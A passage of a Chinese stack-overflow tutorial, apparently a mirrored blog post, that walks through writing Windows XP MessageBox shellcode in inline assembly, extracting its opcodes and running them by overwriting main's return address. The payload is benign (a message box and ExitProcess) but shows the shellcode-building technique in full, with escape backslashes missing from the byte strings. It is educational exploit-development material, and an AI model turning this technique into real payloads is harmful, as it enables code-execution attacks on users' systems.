zoukankan      html  css  js  c++  java
  • 栈溢出笔记1.3 准备Shellcode

    经过1.1和1.2节的讲述,我们已经知道了怎样更改EIP的值。

    程序运行函数之后将跳转到我们设定的位置開始运行,因此,我们须要准备一个自己的程序,接手后面的工作。这是一个什么样的程序?是一个C语言编写的代码?是一个可直接调用的exe?肯定不是,由于EIP所指的地址保存的内容为指令的操作码,CPU读取该操作码运行相应的操作。

    所以我们要准备的程序也应该是一段“操作码”。

    继续写1.1中的Hello World。这次我们要把一个C语言编写的MessageBox换成一个仅仅有“操作码”的程序。要获取操作码非常easy,Immunity Debugger中显示出了每句汇编语句相应的操作码:

    这里写图片描写叙述
    图19

    上图就是调用MessageBoxA函数相应的汇编指令及操作码。

    再正式写Shellcode之前,我们先编写一个汇编形式的MessageBox。

    我们当然不是用MASM,而是使用VC++的内联汇编__asm,这样就须要解决几个问题。

    (1)内联汇编中无法定义字符串常量“example_1”和“HelloWorld”,我们怎样定义它,并获取其地址?
    我们无法用汇编语句中的db在内联汇编中定义字符串常量,但有一个东西在我们的掌控之下——栈,因此,能够将字符串硬编码压入栈上。同一时候能够获取其地址。

    (2)内联汇编中没有API函数MessageBoxA,怎样调用它?
    没有了c语言之间调用的MessageBoxA,但通过example_1在Immunity Debugger中的调试,我们知道了MessageBoxA的地址(见图5),为0x77d507ea(未启用地址随机化,且不同机器不相同),这个地址在我的Windows XP SP3下是固定的。

    因此,我能够直接在汇编中调用该地址即可。

    似乎没什么问题了,写出来例如以下代码:

    /****************************************************************/
    // example_3:内联汇编
    int main()
    {
        __asm
        {
            push    ebp
            mov     ebp, esp
    
            push    0x0000646c  // "ld"
            push    0x726f576f  // "oWor"
            push    0x6c6c6548  // "Hell"
    
            push    0x00000031  // "1"
            push    0x5f656c70  // "ple_"
            push    0x6d617865  // "exam"
    
            push    0
            lea     ebx, [ebp-18h]
            push    ebx
            lea     ebx, [ebp-0ch]
            push    ebx
            push    0
    
            mov     ebx, 0x77d507ea
            call    ebx
    
            add     esp, 18h
            pop     ebp
        }
    
        return 0;
    }
    /********************************************************* */

    是的,不用头文件,也没有C函数(main除外)。编译运行它。然后炸了。。


    这里写图片描写叙述
    图20

    0x77d507ea訪问错误?这不是MessageBoxA函数函数吗?难道是我的地址找错了?用Immunity Debugger看看。
    这里写图片描写叙述
    图21

    这是main函数,能够看到中间我们用内联汇编写的代码基本保持原样。我们在CALL EBX上设断点,能够看到两个字符串及MessageBoxA的參数都已经被成功放入栈中:

    这里写图片描写叙述
    图22

    接着单步运行F7,发现CALL EBX跳转后没有不论什么指令,接着调试器给出了例如以下错误:
    这里写图片描写叙述
    图23

    查看以下内存空间,大概就能够发现问题了:
    这里写图片描写叙述
    图24

    是的,并没有0x77d507ea这个地址范围,也没有MessageBoxA所在的user32.dll。也就是说,程序根本没有载入user32.dll。这就是直接使用地址和通过API调用的区别。编译器不会检查0x77d507ea这个函数是否存在。

    我们用简单的方法来验证这个猜想。用LoadLibrary载入user32.dll:

    /****************************************************************/
    
    #include <Windows.h>
    
    int main()
    {
        LoadLibraryA("user32.dll");
    ...
    /****************************************************************/

    好了。运行成功:
    这里写图片描写叙述
    图25

    但这不是我们想要的,我们不想要头文件,也不想要API调用。所以我们要再改一下,把LoadLibraryA也写入汇编中。LoadLibraryA位于kernel32.dll中,这个动态库是肯定会载入的。

    因此。找到LoadLibraryA的地址即可了,在我的机器上为0x7c801d7b。程序改为这样:

    /*****************************************************************************/
    // example_3:内联汇编
    int main()
    {
        __asm
        {
            push    ebp
            mov     ebp, esp
    
            push    0x0000646c  // "ld"
            push    0x726f576f  // "oWor"
            push    0x6c6c6548  // "Hell"
    
            push    0x00000031  // "1"
            push    0x5f656c70  // "ple_"
            push    0x6d617865  // "exam"
    
            push    0x00006c6c  // "ll"
            push    0x642e3233  // "32.d"
            push    0x72657375  // "user"
    
            lea     ebx, [ebp-24h]
            push    ebx
            mov     ebx, 0x7c801d7b 
            call    ebx // LoadLibraryA
    
            push    0
            lea     ebx, [ebp-18h]
            push    ebx
            lea     ebx, [ebp-0ch]
            push    ebx
            push    0
            mov     ebx, 0x77d507ea // MessageBoxA
            call    ebx
    
            add     esp, 24h
            pop     ebp
        }
    
        return 0;
    }
    /*****************************************************************************/

    编译后运行成功。

    这样,我们把这段汇编代码的操作码抠出来运行,也应该能够达到相同的效果。

    先把操作码抠出来吧:

    /*****************************************************************************/
    55                   // PUSH EBP
    8BEC                 // MOV EBP, ESP
    68 6C640000          //PUSH 646C
    68 6F576F72          //PUSH 726F576F
    68 48656C6C          //PUSH 6C6C6548
    6A 31                //PUSH 31
    68 706C655F          //PUSH 5F656C70
    68 6578616D          //PUSH 6D617865
    68 6C6C0000          //PUSH 6C6C
    68 33322E64          //PUSH 642E3233
    68 75736572          //PUSH 72657375
    8D5D DC              //LEA EBX,DWORD PTR SS:[EBP-24]
    53                   //PUSH EBX
    BB 7B1D807C          //MOV EBX,kernel32.LoadLibraryA
    FFD3                 //CALL EBX
    6A 00                //PUSH 0
    8D5D E8              //LEA EBX,DWORD PTR SS:[EBP-18]
    53                   //PUSH EBX
    8D5D F4              //LEA EBX,DWORD PTR SS:[EBP-C]
    53                   //PUSH EBX
    6A 00                //PUSH 0
    BB EA07D577          //MOV EBX,77D507EA
    FFD3                 //CALL EBX
    /*****************************************************************************/

    去掉了尾部几句恢复EBP。ESP的语句。我们不再须要它。后面你将知道(可是首部的不能去掉,由于要用它寻址字符串),整理一下操作码:

    /*****************************************************************************/
    char opcode[] = "x55x8BxECx68x6Cx64x00x00x68x6Fx57x6Fx72x68x48x65x6Cx6Cx6Ax31x68x70x6Cx65x5F"  
    "x68x65x78x61x6Dx68x6Cx6Cx00x00x68x33x32x2Ex64x68x75x73x65x72x8Dx5DxDCx53xBBx7B"
    "x1Dx80x7CxFFxD3x6Ax00x8Dx5DxE8x53x8Dx5DxF4x53x6Ax00xBBxEAx07xD5x77xFFxD3";  /*****************************************************************************/

    以下是測试程序:

    /*****************************************************************************/
    char opcode[] = "x55x8BxECx68x6Cx64x00x00x68x6Fx57x6Fx72x68x48x65x6Cx6Cx6Ax31x68x70x6Cx65x5F"  
    "x68x65x78x61x6Dx68x6Cx6Cx00x00x68x33x32x2Ex64x68x75x73x65x72x8Dx5DxDCx53xBBx7B"
    "x1Dx80x7CxFFxD3x6Ax00x8Dx5DxE8x53x8Dx5DxF4x53x6Ax00xBBxEAx07xD5x77xFFxD3";   
    
    int main()
    {
        int* ret;
        ret = (int*)&ret + 2;
        (*ret) = (int)opcode;
    }
    /*****************************************************************************/

    測试程序中直接用opcode的地址覆盖了main函数的返回地址。程序运行效果例如以下:
    这里写图片描写叙述
    这里写图片描写叙述
    图26

    MessageBoxA成功运行,可是随后程序崩溃,这是正确的。由于我们覆盖了main的返回地址。opcode接管程序后无法再返回main中,程序跑飞了,无法正常结束。我们须要在opcode中结束它。须要再加一个ExitProcess调用,相同。我找到了它在我机器上的地址:0x7c81cafa。


    将example_3中的最后两句:add esp, 24h, pop ebp 换为例如以下:

    /*****************************************************************************/
    xor     eax, eax
    push    eax
    mov     ebx, 0x7c81cafa // ExitProcess
    call    ebx
    /*****************************************************************************/

    最后得到以下这个正常工作并退出的Shellcode:

    /*****************************************************************************/
    // example_4:MessageBox的Shellcode版本号
    char opcode[] = "x55x8BxECx68x6Cx64x00x00x68x6Fx57x6Fx72x68x48x65x6Cx6Cx6Ax31x68x70x6Cx65x5F"  
    "x68x65x78x61x6Dx68x6Cx6Cx00x00x68x33x32x2Ex64x68x75x73x65x72x8Dx5DxDCx53xBBx7B"
    "x1Dx80x7CxFFxD3x6Ax00x8Dx5DxE8x53x8Dx5DxF4x53x6Ax00xBBxEAx07xD5x77xFFxD3x33xC0"
    "x50xBBxFAxCAx81x7CxFFxD3";   
    
    int main()
    {
        int* ret;
        ret = (int*)&ret + 2;
        (*ret) = (int)opcode;
    }
    /*****************************************************************************/
  • 相关阅读:
    Dell FC Switch zone configuration
    RMAN参考使用手册[转载]
    CentOS下SVN简介、下载、安装
    教你制作启动U盘 用U盘装系统(转载)
    RMAN简明使用手册[转载]
    控制文件和重做日志文件(1)[转载)
    RMAN快速入门指南[转载]
    Dell服务转移
    BE Learing 8 异常及解决办法
    10g rman备份恢复案例[转载]
  • 原文地址:https://www.cnblogs.com/brucemengbm/p/7351262.html
Copyright © 2011-2022 走看看